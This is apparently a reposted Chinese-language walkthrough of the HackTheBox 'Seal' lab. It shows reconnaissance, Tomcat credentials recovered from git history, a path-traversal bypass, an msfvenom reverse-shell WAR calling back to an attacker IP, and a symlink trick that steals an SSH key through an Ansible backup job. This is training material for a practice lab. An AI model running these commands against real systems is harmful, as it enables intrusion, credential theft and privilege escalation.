HackTheBox::Seal

这篇具有很好参考价值的文章主要介绍了HackTheBox::Seal。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

0x00 信息收集

nmap -Pn -p- -T4 --min-rate=1000 10.10.10.250
HackTheBox::Seal
nmap -Pn -p22,443,8080 -sCV 10.10.10.250
HackTheBox::Seal
将seal.htb添加到hosts文件中。
查看443端口对应的界面,未发现可利用的点。
HackTheBox::Seal
查看8080端口,是一个类似git仓库的登录界面。
HackTheBox::Seal
尝试弱口令失败后,注册一个账号进行登录,注册处有一个上传图片的地方,尝试进行文件上传失败。
HackTheBox::Seal
使用注册后的账号成功登录,通过查看仓库,发现使用了tomcat,并且根据提示内容看到使用了nginx作为负载均衡。查看仓库中的tomcat-users.xml文件,未发现账号密码信息。最终通过commit,找到了升级后的tomcat-users.xml文件,得到了tomcat的账号密码。
tomcat/42MrHBf*z8{Z%
HackTheBox::Seal

0x01 漏洞利用

得到账号密码后,则尝试进行登录,最终在443端口的路径/manager/status出登录得到的账号密码
HackTheBox::Seal
登录管理后台后,未发现可以上传war包的地方,继续进行尝试。
尝试访问路径,都会提示403,最后发现了tomcat的一个路径绕过漏洞。
https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/
尝试绕过,看是否能进行文件上传,最终得到文件上传的路径。
HackTheBox::Seal
生成war包进行上传

msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.14.14" LPORT=4444 -f war > shell.war

HackTheBox::Seal
此处上传需要使用burp进行抓包改路径并进行绕过,否则会上传失败。
HackTheBox::Seal
访问路径/shell,成功得到了shell
HackTheBox::Seal

python3 -c 'import pty; pty.spawn("/bin/bash")'

由于tomcat用户权限较低,因此需要先将用户的权限提升为luis
HackTheBox::Seal

0x02 权限提升

find / -user luis 2>/dev/null | grep -vE 'proc|/\.'

在路径/opt/backups/playbook中发现一个run.yml文件。
HackTheBox::Seal
通过相关参考发现这个yml文件是在做备份的功能,且权限为luis。
https://docs.ansible.com/ansible/2.3/synchronize_module.html
此处漏洞利用思路为,将luis的ssh_keyjinxing进行备份,通过查看备份文件得到key,最后使用ssh登录luis用户。

ln -s /home/luis/.ssh /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/
ls -al /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/

HackTheBox::Seal

ls /opt/backups/archives
cp /opt/backups/archives/backup-2021-11-24-02:36:34.gz ./backup.tar.gz
tar -xzvf backup.tar.gz

HackTheBox::Seal
得到ssh_key
HackTheBox::Seal
使用ssh进行登录
HackTheBox::Seal
使用sudo -l查看相关权限
HackTheBox::Seal
参考https://gtfobins.github.io/gtfobins/ansible-playbook/
HackTheBox::Seal文章来源地址https://www.toymoban.com/news/detail-459872.html

到了这里,关于HackTheBox::Seal的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【网络安全-信息收集】网络安全之信息收集和信息收集工具讲解(提供工具)

    分享一个非常详细的网络安全笔记,是我学习网安过程中用心写的,可以点开以下链接获取: 超详细的网络安全笔记 工具下载百度网盘链接(包含所有用到的工具): 百度网盘 请输入提取码 百度网盘为您提供文件的网络备份、同步和分享服务。空间大、速度快、安全稳固,

    2024年02月08日
    浏览(50)
  • 网络安全信息收集初探之域名信息收集

    扫描单个域名 批量扫描域名 oneforall 额外参数 ![在这里插入图片描述](https://img-blog.csdnimg.cn/615763f979ea453091ad715f69980555.png https://crt.sh/ https://search.censys.io/

    2024年02月13日
    浏览(53)
  • 4.1 - 信息收集 - 子域名收集

    「作者简介」: CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者 「推荐专栏」: 对网络安全感兴趣的小伙伴可以关注专栏《网络安全入门到精通》 子域名就是下一级域

    2024年02月05日
    浏览(42)
  • 《渗透测试》-前期信息收集及工具介绍01(信息收集简介、JSFinder、OneForAll)

    信息收集是指通过各种方式获取所需要的信息,以便我们在后续的渗透过程更好的进 行。比如目标站点IP、中间件、脚本语言、端口、邮箱等等。信息收集包含资产收集 但不限于资产收集。 1、信息收集是渗透测试成功的保障 2、更多的暴露面 3、更大的可能性 1、主动信息收

    2024年02月03日
    浏览(54)
  • 内网安全 信息收集(收集内网计算机的所有信息 进行攻击.)

    在   渗透测试人员 进入一个内 网后,面对的是一片 “ 未知的区域 ”,所以 渗透测试人员首先会对当前所 处的网络环境进行判断,通常的判断分为三种. (1) 我是谁? —— 对计算机的角色进行判断. (2)我在哪? —— 对目前机器所处位置区域的判断。 (3)这是哪?

    2024年02月02日
    浏览(47)
  • 【PyTorch 实战2:UNet 分割模型】10min揭秘 UNet 分割网络如何工作以及pytorch代码实现(详细代码实现)

      U-Net,自2015年诞生以来,便以其卓越的性能在生物医学图像分割领域崭露头角。作为FCN的一种变体,U-Net凭借其Encoder-Decoder的精巧结构,不仅在医学图像分析中大放异彩,更在卫星图像分割、工业瑕疵检测等多个领域展现出强大的应用能力。UNet是一种常用于图像分割的卷

    2024年04月28日
    浏览(40)
  • 渗透测试之信息收集篇-服务器子域名收集

    你可能对某个服务器渗透失败,没有发现入侵点,所以我们可以考虑扩大攻击面,对target.com的子域名 进行渗透,然后横向移动。 使用bbot对目标子域进行收集 https://github.com/blacklanternsecurity/bbot/wiki#installation 关于子域名收集,推荐一篇很好的文章,文章地址:https://blog.blackl

    2024年02月16日
    浏览(35)
  • 一款强大的红队信息收集和资产收集工具(Kscan)

    Kscan是一款纯go开发的全方位扫描器,具备端口扫描、协议检测、指纹识别等功能。支持协议1200+,协议指纹10000+,应用指纹2000+,暴力PJ协议10余种。 Kscan能够接受多种输入格式,无需在使用之前对扫描对象进行分类,比如区分为IP,还是URL地址等,这对于使用者来说无疑是徒

    2023年04月08日
    浏览(40)
  • 渗透测试 | Web信息收集

    0x00 免责声明         本文仅限于学习讨论与技术知识的分享,不得违反当地国家的法律法规。对于传播、利用文章中提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任,一旦造成后果请自行承担!            

    2024年02月01日
    浏览(90)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包